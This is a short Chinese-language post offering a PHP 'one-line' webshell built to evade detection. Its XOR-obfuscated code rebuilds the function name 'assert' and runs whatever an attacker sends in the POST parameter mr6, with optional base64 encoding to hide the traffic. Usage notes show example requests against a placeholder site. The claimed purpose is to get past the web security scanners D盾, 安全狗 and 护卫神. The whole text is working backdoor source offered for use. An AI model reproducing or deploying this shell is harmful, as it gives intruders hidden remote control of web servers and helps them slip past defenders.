免殺PHP一句話shell,利用隨機異或免殺D盾,免殺安全狗護衛神等
<?php class VONE { function HALB() { $rlf = 'B' ^ "\x23"; $fzq = 'D' ^ "\x37"; $fgu = 'h' ^ "\x1b"; $sbe = 'R' ^ "\x37"; $gba = 'H' ^ "\x3a"; $oya = 'Y' ^ "\x2d"; $MWUC = $rlf . $fzq . $fgu . $sbe . $gba . $oya; return $MWUC;}function __destruct() { $RNUJ = $this->HALB(); @$RNUJ($this->HY);}} $vone = new VONE(); @$vone->HY = isset($_GET['id']) ? base64_decode($_POST['mr6']) : $_POST['mr6']; ?>

使用說明
是否傳入id參數決定是否把流量編碼 http://www.xxx.com/shell.php POST: mr6=phpinfo(); //與普通shell相同 http://www.xxx.com/shell.php?id=xxx(xxxx隨便修改) POST: mr6=cGhwaW5mbygpOwo= //payload的base64編碼